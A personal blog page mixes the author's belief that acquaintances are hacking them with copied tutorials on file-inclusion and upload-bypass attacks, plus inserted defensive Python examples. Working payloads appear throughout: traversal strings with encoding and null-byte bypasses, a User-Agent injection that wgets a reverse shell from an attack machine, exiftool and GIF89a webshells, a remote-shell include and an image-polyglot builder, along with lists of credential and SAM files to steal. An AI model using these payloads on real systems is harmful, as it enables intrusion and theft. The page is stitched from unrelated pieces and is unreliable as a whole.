Hypothesis on my Hacking Problem,Munki etc. Al..ABM,YouTube,Devices within Devices

1.) Local and remote file inclusion

I realized I was listing all of the hacking stuff I'm finding, as I keep continuing on this terrible journey and finding out who is doing this to me, on my regular pages, and I realize that's probably boring and makes me look a bit nutty. So I've decided to compile a page to list it all here, so that my normal feed can be more pleasant, like I hope my normal life can grow to be again.

Munki MDM. I had this real twat of a woman staying with me last year. She said she needed a place to stay, blah blah blah; it was all a lie. She did really horrible things to me, who was just seemingly trying to help her, i.e.: throwing my IDs out on the floor at the gas station, kicking me out of a hotel room and then renting it again another night in my name, lying and saying that she went to jail, dressing up as me and robbing Salvation Army boxes. Anyway, she was always watching monkey shows; monkeys, monkeys, monkeys!! on whatever, Discovery Channel. This software is the reason. Everyone that is or was involved in hacking me, the whole time they had to broadcast it proudly. They could not keep secret what they were doing; they were so proud of themselves. They love to rub it in my face and make me feel stupid. I knew what they were doing and I knew it was them; I just did not know how, what software they were employing, how to get around it or describe it, or how to actually call and report it to real authorities. Anywho, this is one of the stupid softwares, below:

Munki vs MDM?

"Munki is an open-source project that layers additional app capabilities onto the native Apple MDM protocol. Whereas MDM supports installing a subset of macOS package formats, Munki supports a much wider range of software, including the common .dmg (Apple Disk Image) format." (SimpleMDM blog, Feb 13, 2023)

Courtesy of https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/lfi-rfi

Local file inclusion (LFI) vulnerabilities allow an attacker to read local files on the web server using malicious web requests, such as:

  • Web configuration files
  • Log files
  • Password files
  • Other sensitive system data

LFI can also lead to remote code execution (RCE) when the attacker can get code into a file the server will include: a poisoned access log, /proc/self/environ, a PHP session file, or an uploaded image carrying PHP. In most cases the root cause is poor or missing validation of the file name parameter.

Remote file inclusion (RFI) is similar, but the vulnerable include accepts a URL rather than only a local path, so the attacker points it at a file hosted on a server they control (in PHP this requires allow_url_include=On, which is off by default). The remote file is fetched and executed in the context of the web server user (e.g. www-data).

Techniques

Basic

Assuming the target is a Linux system, test whether you can display /etc/passwd by going back five directory levels (extra ../ segments above / are ignored, so overshooting is harmless):

http://host/?page=../../../../../etc/passwd

Even if this doesn't work, it doesn't mean the site is immune to path traversal. When filtering input, developers often block forward slashes but forget backslashes or encoded characters.

wget

Browsers may normalize dot segments (../) in a URL before sending the request, so a command-line client such as wget or curl, which sends exactly what you typed, may work where the browser does not:

wget "http://[host]/wp-content/uploads/page.php?url=../../../../../../../var/www/html/wp-config.php"

Nesting traversal sequences

If the application is attempting to sanitize user input by removing traversal sequences, but does not apply this filter recursively, then it may be possible to bypass the filter by placing one sequence within another:

....//

....\/

..../\

....\\

How about that, SIS. I had what I thought was a friend start calling me "sis" a few years ago; I thought it was nice and endearing. Little did I know... I mean, I should have known.

URL-encoded

Encoding all the slashes and dots in your path traversal could bypass input filters:

dot %2e

forward slash %2f

backslash %5c

Example:

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd

Double URL-encoded

Another encoding method:

dot %252e

forward slash %252f

backslash %255c

Example:

%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd

Overlong UTF-8 encoding

You can also use the illegal Unicode payload type in Burp Intruder for this technique. These sequences only work when the server's UTF-8 decoder accepts overlong encodings, which a conformant decoder rejects:

dot %c0%2e %e0%40%ae %c0ae etc.

forward slash %c0%af %e0%80%af %c0%2f etc.

backslash %c0%5c %c0%80%5c etc.

Null-byte injection

Some applications check whether the user-supplied file name ends in a particular file type, or append an extension themselves, and reject anything else. In older PHP (before 5.3.4) a null byte (%00 in the URL, 0x00 in hex) in the LFI/RFI parameter terminated the path when it reached the underlying C string functions, so any bytes after it were ignored. Current PHP versions reject paths containing a null byte, so this only works against legacy targets.

In the following code, the application appends the extension .php to the request variable $file:

$file = $_GET['page'];

require_once("/var/www/$file.php");

Requesting ../../../etc/passwd here fails because the included path becomes /var/www/../../../etc/passwd.php, which does not exist. Adding a null byte after passwd truncates the path before the appended .php:

http://website/?page=../../../etc/passwd%00
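The three filter weaknesses above (non-recursive stripping, decode-once checks, and the legacy null-byte truncation) are easiest to see side by side. The block below is an added example, not code from the grimoire or from any real application: the filters are models of the behaviour described in the text, WEB_ROOT and ALLOWED_PAGES are assumptions, and the "second decode" flag stands in for a framework that URL-decodes the parameter again downstream. The canonical check at the end shows why judging the resolved path, rather than the input text, leaves nothing for the bypasses to bypass.

```python
# Added example (not from the grimoire or any real application): models of the
# weak filters described above next to a canonical check that defeats them.
# WEB_ROOT, ALLOWED_PAGES and the "second decode" behaviour are assumptions.
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"                    # assumed web root
ALLOWED_PAGES = {"home", "about", "contact"}  # assumed page-name allowlist


def naive_strip_filter(page: str) -> str:
    """Non-recursive sanitizer: deletes every '../' in a single pass.
    '....//' loses its middle '../' and collapses to '../'."""
    return page.replace("../", "")


def decode_once_filter(page: str) -> Optional[str]:
    """URL-decodes once, then rejects '..' and backslashes.
    Returns the decoded value if accepted, None if rejected."""
    decoded = unquote(page)
    if ".." in decoded or "\\" in decoded:
        return None
    return decoded


def vulnerable_include_path(filtered: str, second_decode: bool = False) -> str:
    """Path the vulnerable page would include after its filter accepted `filtered`.
    second_decode models a framework that URL-decodes the value a second time."""
    if second_decode:
        filtered = unquote(filtered)
    return posixpath.normpath(posixpath.join(WEB_ROOT, filtered))


def legacy_php_require_path(page: str) -> str:
    """Model of require_once("/var/www/$file.php") on PHP before 5.3.4: the path
    reached C string functions and was cut at the first NUL, dropping '.php'."""
    raw = unquote(page) + ".php"
    truncated = raw.split("\x00", 1)[0]
    return posixpath.normpath(posixpath.join("/var/www", truncated))


def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Decode until the string is stable, so %252e%252e%252f ends up as '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def canonical_check(raw_page: str, web_root: str = WEB_ROOT) -> bool:
    """Hardened check: decode completely, normalize, and require the final path to
    stay under web_root. It judges the resolved path rather than the input text,
    so nesting and encoding tricks have nothing to bypass. A real implementation
    should also use os.path.realpath so symlinks are resolved."""
    target = posixpath.normpath(posixpath.join(web_root, fully_decode(raw_page)))
    return target == web_root or target.startswith(web_root + "/")


def safe_resolve(page: str, web_root: str = WEB_ROOT) -> str:
    """Preferred fix: map the parameter to an allowlisted name, then still confirm
    containment as defence in depth."""
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allowlist")
    if not canonical_check(page + ".php", web_root):
        raise ValueError("path escapes web root")
    return posixpath.join(web_root, page + ".php")


if __name__ == "__main__":
    nested = "....//....//....//etc/passwd"
    print(naive_strip_filter(nested))                            # ../../../etc/passwd
    print(vulnerable_include_path(naive_strip_filter(nested)))   # /etc/passwd
    double = "%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd"
    print(vulnerable_include_path(decode_once_filter(double), second_decode=True))
    print(legacy_php_require_path("../../../etc/passwd%00"))    # /etc/passwd
    print(canonical_check(double), canonical_check("about"))    # False True
```

Note that canonical_check applied to the raw nested payload "....//" reports it as safe, and that is correct: "...." is an ordinary directory name on the filesystem. The nested sequence only becomes a traversal after a one-pass filter rewrites it, which is exactly why stripping is the wrong tool.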

proc/self/environ method

If you can read /proc/self/environ through the LFI, you may be able to get a shell. /proc/self/environ is the environment of the process serving your request; where PHP runs as CGI/suPHP, each request's CGI variables, including HTTP_USER_AGENT, appear in it (with mod_php or PHP-FPM it usually shows only the server's startup environment, and the technique fails). Intercept the /proc/self/environ request and replace the User-Agent header with PHP that downloads a reverse shell (e.g. a PHP reverse shell) and writes it into the web server's working directory:

<?system('wget http://[attack machine]/reverseshell.txt -O shell.php');?>

Then execute the shell by requesting the URL where it was written:

http://[host]/folder/shell.php

this is scary
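Everything in this section leaves a trace in the web server's access log: traversal sequences (plain or double-encoded), the %00 suffix, requests for /proc/self/environ, and PHP tags arriving in the User-Agent header. The detector below is an added example, not part of the grimoire or of this page's original text. The log lines are constructed for the example in Apache combined format with RFC 5737 documentation addresses, and the last rule, flagging a .php request under an uploads directory, is an assumption about where a dropped shell tends to land rather than anything the text states.

```python
# Added example (not from the grimoire): a small detector for LFI attempts and
# header poisoning in Apache combined-format access logs. The log lines are
# constructed for this example; the "uploads" heuristic is an assumption.
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = '''
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 1432 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:09 +0000] "GET /index.php?page=../../../../../etc/passwd HTTP/1.1" 200 2011 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:15 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2011 "-" "curl/8.4.0"
203.0.113.7 - - [10/Mar/2024:12:00:21 +0000] "GET /index.php?page=../../../etc/passwd%00 HTTP/1.1" 200 2011 "-" "Wget/1.21"
203.0.113.7 - - [10/Mar/2024:12:00:30 +0000] "GET /index.php?page=../../../proc/self/environ HTTP/1.1" 200 5120 "-" "<?system('wget http://203.0.113.7/reverseshell.txt -O shell.php');?>"
198.51.100.4 - - [10/Mar/2024:12:01:02 +0000] "GET /wp-content/uploads/shell.php?cmd=id HTTP/1.1" 200 88 "-" "Mozilla/5.0"
'''

# Apache "combined" LogFormat: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')                  # ../ or ..\ after decoding
PHP_TAG_RE = re.compile(r'<\?(?!xml)', re.IGNORECASE)    # <?php, <?=, <?system(...)
UPLOADS_PHP_RE = re.compile(r'/uploads/[^/?]+\.ph(p\d?|tml)(\?|$)', re.IGNORECASE)


def full_decode(value: str, max_rounds: int = 3) -> str:
    """Undo layered URL encoding so %252e%252e%252f is judged as '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> List[str]:
    """Return the indicator names that fire for one parsed log entry."""
    reasons = []
    path = full_decode(entry["path"])
    if TRAVERSAL_RE.search(path):
        reasons.append("traversal")
    if "\x00" in path:                                     # %00 truncation attempt
        reasons.append("null-byte")
    if "/proc/self/environ" in path:
        reasons.append("proc-self-environ")
    if PHP_TAG_RE.search(entry["ua"]) or PHP_TAG_RE.search(entry["referer"]):
        reasons.append("php-in-header")                    # log / environ poisoning
    if UPLOADS_PHP_RE.search(entry["path"]):
        reasons.append("php-under-uploads")                # assumed shell location
    return reasons


def scan(log_text: str) -> List[Tuple[int, str, List[str]]]:
    """Scan a log blob; return (line number, client IP, indicators) per hit."""
    findings = []
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append((lineno, entry["ip"], reasons))
    return findings


if __name__ == "__main__":
    for lineno, ip, reasons in scan(SAMPLE_ACCESS_LOG):
        print(f"line {lineno} from {ip}: {', '.join(reasons)}")
```

Decoding before matching is the important step: a rule that looks for a literal "../" in the raw request line misses the double-encoded attempt on line 3 entirely. The same decode-then-normalize habit applies to the server-side fix.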

Interesting files

If an LFI vulnerability exists, look for these files:

Linux

Linux system and user files:

/etc/passwd

/etc/shadow

/etc/issue

/etc/group

/etc/hostname

/home/user/

/home/user/.ssh

/home/user/.bash_history

Log files

Potentially interesting logfiles:

/var/log/apache/access.log

/var/log/apache2/access.log

/var/log/httpd/access_log

/var/log/apache/error.log

/var/log/apache2/error.log

/var/log/httpd/error_log

CMS configuration files

If there is a web server, always check /var/www/html for interesting files, including robots.txt in the root web folder.

Content management system configuration files:

WordPress: /var/www/html/wp-config.php

Joomla: /var/www/configuration.php

Dolphin CMS: /var/www/html/inc/header.inc.php

Drupal: /var/www/html/sites/default/settings.php

Mambo: /var/www/configuration.php

PHPNuke: /var/www/config.php

PHPbb: /var/www/config.php

Windows

Files that may exist on Windows systems:

c:\WINDOWS\system32\eula.txt

c:\boot.ini

c:\WINDOWS\win.ini

c:\WINNT\win.ini

c:\WINDOWS\Repair\SAM

c:\WINDOWS\php.ini

c:\WINNT\php.ini

c:\Program Files\Apache Group\Apache\conf\httpd.conf

c:\Program Files\Apache Group\Apache2\conf\httpd.conf

c:\Program Files\xampp\apache\conf\httpd.conf

c:\php\php.ini

c:\php5\php.ini

c:\php4\php.ini

c:\apache\php\php.ini

c:\xampp\apache\bin\php.ini

c:\home2\bin\stable\apache\php.ini

c:\home\bin\stable\apache\php.ini

The system and SAM files may be in different locations. Also, the filter in front of the file system may be case-sensitive even though Windows paths are not, so try both cases.

# %SYSTEMROOT% is usually C:\Windows

windows\repair\SAM

%SYSTEMROOT%\repair\SAM

%SYSTEMROOT%\System32\config\RegBack\SAM

%SYSTEMROOT%\System32\config\SAM

%SYSTEMROOT%\repair\system

%SYSTEMROOT%\System32\config\SYSTEM

%SYSTEMROOT%\System32\config\RegBack\system


2.) ARP

3.) File upload bypass

File upload mechanisms are very common on websites but often have poor validation. This lets attackers upload malicious files to the web server, which can then be executed by other users or by the server itself. It also happens in authenticated areas of a site (e.g. installing WordPress plugins).

File extension

Developers may blacklist specific file extensions considered dangerous. This can be bypassed with alternate extensions the server still executes (below), with case variations, or with double extensions. For example, a .php file may be uploaded and executed simply by renaming it file.PHp (if the comparison is case-sensitive) or file.php.jpg (on Apache configured with AddHandler for .php, which honours every extension in the name).

Alternate extensions

Type         Extensions
php          .phtml, .php, .php3, .php4, .php5, .inc
asp          .asp, .aspx
perl         .pl, .pm, .cgi, .lib
jsp          .jsp, .jspx, .jsw, .jsv, .jspf
ColdFusion   .cfm, .cfml, .cfc, .dbm

MIME type

Checking the declared MIME type is another common upload validation, but the Content-Type of the uploaded part is set by the client, so it can be changed by intercepting the POST request on the way to the server.

Normal PHP MIME type:

Content-Type: application/x-php

Replace with:

Content-Type: image/jpeg

PHP getimagesize()

For uploads that validate the image with PHP's getimagesize(), the file must still parse as an image, but it may be possible to get code execution by placing the PHP in the image's Comment metadata and saving it with a double extension such as file.jpg.php.

You can do this with GIMP or exiftool:

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' file.jpg

mv file.jpg file.php.jpg

Tutorials disagree about whether .php goes first or last because it depends on the server configuration. On Apache with a legacy AddHandler application/x-httpd-php .php directive, every extension in the name counts, so file.php.jpg is executed as PHP while still ending in .jpg; with the modern SetHandler inside <FilesMatch "\.php$">, only a name ending in .php runs, so file.jpg.php only helps if the upload filter lets .php through. Try both.

GIF89a; header

GIF89a is the signature at the start of every GIF file. If uploaded content is sniffed for a known file signature, the check can sometimes be fooled by putting it at the top of the PHP payload (use <?php instead of <? if short_open_tag is disabled on the target):

GIF89a;

<?

system($_GET['cmd']); # shellcode goes here

?>


In my last two posts about Malicious PHP Code in the Form of an Image, I only talked about uploading PHP as image files and how websites can be vulnerable to that. In this post I'm going to talk about how to inject PHP code into a valid image file.

Because malicious PHP can be uploaded as a JPG or GIF through insecure upload forms, many forms no longer check only the extension: they check the content of the file, or both the content and the extension. In those cases plain PHP cannot be uploaded as an image.

Say an upload form checks the contents of the file but not its extension. That is more secure than checking only the extension, but an attacker can get around it by injecting PHP into a valid image and uploading the result as PHP, which is what this post covers.

There are a few ways to add PHP code to an image: edit the EXIF metadata with an EXIF editor, add the code to the comment field in a program like GIMP, or use a hex editor.

There is a simpler way. First make a small plain white GIF (a JPG will do too). Keep it white: other images sometimes produce PHP errors because of the bytes in the image data.

Make a small PHP file, and keep the code short, because a long payload appended to an image can also trigger PHP errors. This stub will do (including a remote URL requires allow_url_include=On in the target's php.ini, which is off by default):

<?php
include ("http://example.com/shell.php");
?>

Save this as a PHP file.

Then write this small Python script, which simply concatenates the image and the PHP file:

# Valid GIF first so the file keeps its image signature; PHP code follows the image data.
with open('msgif.gif', 'rb') as gif, open('test.php', 'rb') as php:
    lavender = gif.read() + php.read()
with open('newphp.php', 'wb') as out:
    out.write(lavender)

Run the script; the result is a valid image file with malicious PHP code after the image data, saved with a .php extension.

You can upload this to a form that checks the content of the file but not the extension. Such forms usually check the file header (sometimes also the width and height of the image) and skip the extension check because checking content is considered better, so the file is accepted as a PHP file. Requesting the file's URL executes the PHP, the GIF or JPG bytes come out as junk output, and the include fetches the remote shell, which then runs on the server hosting the malicious image.

For upload forms that check both the extension and the content, the same file can be renamed to .gif or .jpg and uploaded, and then executed as PHP with an image extension as I described in my previous two posts.

Some sites also check the image size with PHP's getimagesize(), so an image that is too small will not be allowed; a bigger white image will most probably be accepted.

Forms can defend against this by not storing the upload as-is: recreate the image on the server with PHP's GD image functions (e.g. imagecreatefromgif() followed by imagegif()), which drops anything that is not pixel data, and strip the metadata before saving.

That wraps up injecting malicious PHP code into an image; I'll write another post if I have anything more to add.
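Both halves of this section (the grimoire's extension, MIME and GIF89a tricks, and this post's concatenation method) and the defence described just above come together in the block below. It is an added example, not code from either original post: the weak checks are models of what the text describes, the minimal GIF is a hand-built 35-byte file, ALLOWED_EXTENSIONS and the validator's policy are assumptions, and the PHP payload is the one-liner from the grimoire section embedded as constructed sample data. The GIF walker shows why parsing to the trailer catches an appended payload while an EXIF or comment-extension payload needs the re-encoding fix instead.

```python
# Added example (not from either original post): weak upload checks modelled
# next to stricter ones, plus the GIF-polyglot trick and a parser that catches
# it. ALLOWED_EXTENSIONS and the validator's policy are assumptions.
import struct
from typing import Tuple

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}            # assumed allowlist
PHP_LIKE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "inc"}
PHP_PAYLOAD = b"<?php system($_GET['cmd']); ?>"              # constructed payload


def weak_blacklist_check(filename: str) -> bool:
    """Model of the weak check: last extension only, compared case-sensitively."""
    return filename.rsplit(".", 1)[-1] not in {"php", "phtml"}


def strict_extension_check(filename: str) -> bool:
    """Lowercase and look at every dotted part: the final one must be allowlisted
    and none may be a PHP-style extension, so file.PHp and file.php.jpg both fail."""
    parts = filename.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False
    return parts[-1] in ALLOWED_EXTENSIONS and not any(p in PHP_LIKE for p in parts[1:])


def minimal_gif() -> bytes:
    """Smallest well-formed GIF89a (35 bytes): header, 1x1 logical screen, a
    two-colour global palette, one image with a tiny LZW stream, 0x3B trailer."""
    return (b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"
            + b"\xff\xff\xff\x00\x00\x00"                       # white, black
            + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"
            + b"\x02\x02\x44\x01\x00"                           # LZW data
            + b"\x3b")


def signature_check(data: bytes) -> bool:
    """What a header-only or getimagesize()-style check effectively tests:
    a known image signature at offset 0. A GIF with PHP appended passes."""
    return (data[:6] in (b"GIF87a", b"GIF89a")
            or data[:3] == b"\xff\xd8\xff"
            or data[:8] == b"\x89PNG\r\n\x1a\n")


def gif_dimensions(data: bytes) -> Tuple[int, int]:
    return struct.unpack("<HH", data[6:10])


def gif_trailing_bytes(data: bytes) -> bytes:
    """Walk the GIF block structure to the 0x3B trailer and return what follows.
    Catches payloads appended after a valid image (the concatenation trick); it
    does not catch PHP hidden inside a comment extension or EXIF, which is why
    re-encoding the image server-side is the stronger fix."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")

    def skip_sub_blocks(p: int) -> int:
        while True:                                 # length-prefixed blocks, 0 ends
            n = data[p]
            p += 1
            if n == 0:
                return p
            p += n

    pos = 13                                        # header (6) + screen descriptor (7)
    if data[10] & 0x80:                             # global colour table present
        pos += 3 * (2 ** ((data[10] & 0x07) + 1))
    while pos < len(data):
        block = data[pos]
        if block == 0x3B:                           # trailer: anything after is junk
            return data[pos + 1:]
        if block == 0x2C:                           # image descriptor
            lflags = data[pos + 9]
            pos += 10
            if lflags & 0x80:                       # local colour table
                pos += 3 * (2 ** ((lflags & 0x07) + 1))
            pos += 1                                # LZW minimum code size
            pos = skip_sub_blocks(pos)
        elif block == 0x21:                         # extension: introducer + label
            pos = skip_sub_blocks(pos + 2)
        else:
            raise ValueError("malformed GIF at offset %d" % pos)
    raise ValueError("GIF has no trailer")


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide from the bytes, never from the client-supplied Content-Type header."""
    if not strict_extension_check(filename):
        return False, "extension not allowed"
    if not signature_check(data):
        return False, "not a recognised image"
    if data[:6] in (b"GIF87a", b"GIF89a"):
        try:
            if gif_trailing_bytes(data):
                return False, "trailing data after GIF trailer"
        except ValueError as exc:
            return False, str(exc)
    return True, "ok"


if __name__ == "__main__":
    polyglot = minimal_gif() + PHP_PAYLOAD
    print(signature_check(polyglot), gif_dimensions(polyglot))   # True (1, 1)
    print(validate_upload("avatar.gif", polyglot))
```

The polyglot passes signature_check and still reports 1x1 dimensions, which is all a header-based check sees; only walking the structure to the trailer exposes the appended PHP. Extension handling follows the same principle as the path checks earlier on the page: normalise first, then compare against an allowlist rather than a blacklist.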

Credits: Sam BowneLeRes

Posted 18th July 2012 by Unknown

Labels: Hacking, Infosec, Malicious PHP In Images, Malware, PHP

Credit: http://www.techyzilla.com



